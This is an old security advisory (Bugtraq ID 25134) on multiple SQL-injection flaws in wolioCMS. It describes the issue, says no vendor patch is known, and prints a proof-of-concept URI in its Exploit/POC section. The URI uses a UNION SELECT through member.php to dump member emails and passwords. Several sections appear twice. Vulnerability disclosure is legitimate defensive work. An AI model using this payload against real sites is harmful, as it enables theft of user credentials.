WolioCMS Multiple SQL Injection Vulnerabilities
BID:25134
Info
WolioCMS Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 25134 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 30 2007 12:00AM |
| Updated: | Jul 30 2007 09:55PM |
| Credit: | k1tk4t is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
wolioCMS wolioCMS 0 |
| Not Vulnerable: | |
Discussion
WolioCMS Multiple SQL Injection Vulnerabilities
wolioCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
wolioCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
WolioCMS Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URI is available:
http://www.example.com/_woliocms/member.php?member=admin&act=page&id='/**/UNION/**/ALL/**/SELECT/**/null,null,concat(member_email,'-',member_password),null,null,null,null,null,null,null/**/FROM/**/member/*
Sample exploit code is also available:
Attackers can use a browser to exploit these issues.
The following example URI is available:
http://www.example.com/_woliocms/member.php?member=admin&act=page&id='/**/UNION/**/ALL/**/SELECT/**/null,null,concat(member_email,'-',member_password),null,null,null,null,null,null,null/**/FROM/**/member/*
Sample exploit code is also available:
Solution / Fix
WolioCMS Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
WolioCMS Multiple SQL Injection Vulnerabilities
References:
References:
- wolioCMS Web Site (wolioCMS)
- wolioCMS SQL Injection ([email protected])